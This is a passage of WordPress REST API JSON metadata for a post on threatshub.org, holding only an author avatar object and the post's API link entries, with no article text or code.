Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/58260","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=58260"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/58260\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/58261"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=58260"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=58260"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=58260"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}